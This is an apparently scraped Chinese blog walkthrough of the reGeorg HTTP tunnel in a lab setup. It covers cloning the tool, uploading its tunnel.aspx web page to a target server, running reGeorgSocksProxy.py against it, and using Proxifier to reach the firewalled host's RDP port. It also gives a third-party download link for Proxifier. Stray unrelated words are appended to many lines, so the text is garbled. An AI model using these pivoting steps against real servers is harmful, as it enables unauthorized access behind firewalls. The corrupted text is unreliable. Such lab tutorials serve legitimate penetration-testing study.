HTTP隧道代理

reGeorg的前身是2008年SensePost在BlackHat USA 2008 的 reDuh延伸與擴展。也是目 前安全從業人員使用最多,範圍最廣,支持多豐富的一款http隧道。從本質上講,能夠將 JSP/PHP/ASP/ASPX等頁面上傳到目標服務器,即可以訪問該服務器後面的主機。python

 

攻擊機 192.168.31.102  kaligit

192.168.31.96    win 10github

靶機 192.168.31.106  Windows 2003安全

 

 

下載:服務器

https://github.com/sensepost/reGeorgpost

 安裝:url

git clone https://github.com/sensepost/reGeorg.gitspa

ls3d

python reGeorgSocksProxy.py ‐h代理

 

 

 

PS:這個程序須要安裝PIP urllib3 個人已經裝了

若是沒有安裝的話執行命令:

pip install urllib3

 

 

 

安裝完成後把reGeorg 下的tunnel上傳到目標靶機

 

 

 

 

 

目標靶機是開了防火牆的咱們訪問是訪問3389是不通的

接下來配置代理

 

 

 

 

 

 

 

 

 

 

 

 

 

Kali攻擊機執行

 

python reGeorgSocksProxy.py -u "http://192.168.31.106/include/config/tunnel.aspx"  -p 8080 -l 0.0.0.0

 

 

 

þ 這裏咱們來說講0.0.0.0,若是咱們直接ping 0.0.0.0是不行的,他在IPV4中表示的是無效的目標地址,可是在服務器端它表示

本機上的全部IPV4地址,若是一個服務有多個IP地址(192.168.1.2和10.1.1.12),那麼咱們若是設置的監聽地址是0.0.0.0那

麼咱們不管是經過IP192.168.1.2仍是10.1.1.12都是能夠訪問該服務的。在路由中,0.0.0.0表示的是默認路由,即當路由表中

沒有找到徹底匹配的路由的時候所對應的路由。

 

 

 

這時候在操做機器

Windows10下配合Proxifier: (沒有這個程序的怎末辦?百度!)

或者連接:https://pan.baidu.com/s/1XunHE8RiLu_K4JpWMpVDoA

提取碼:txe6

 

 

 

 

 

 

 

 

鏈接3389

 

 

 

相關文章
相關標籤/搜索